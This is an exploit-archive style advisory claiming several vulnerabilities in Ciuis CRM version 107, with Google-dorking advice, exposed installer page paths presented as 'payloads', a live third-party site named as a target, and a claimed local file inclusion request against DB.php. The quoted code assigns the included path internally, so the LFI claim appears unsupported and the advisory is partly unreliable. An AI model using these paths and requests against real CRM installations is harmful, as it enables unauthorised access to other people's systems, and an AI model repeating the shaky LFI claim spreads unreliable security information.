============================================================================
| # Title : Ciuis™ CRM 107 Multi Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 Français V.(Pro) |
| # Version : 107 |
| # Vendor : http://www45.zippyshare.com/d/98u0mrS4/15622/ciuis-107.rar |
| # Dork : n/a |
============================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
[+] use payload : /install/app/pages/complete.php
[+] use payload : /install/app/pages/requirements.php
http://drmcrm.com/install/app/pages/complete.php
http://drmcrm.com/install/app/pages/requirements.php
LFI :
ciuis\system\database\DB.php
line 57,58,63
if ( ! file_exists($file_path = APPPATH.'config/'.ENVIRONMENT.'/database.php')
&& ! file_exists($file_path = APPPATH.'config/database.php'))
include($file_path);
http://127.0.0.1/system/database/DB.php?file_path=evil
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================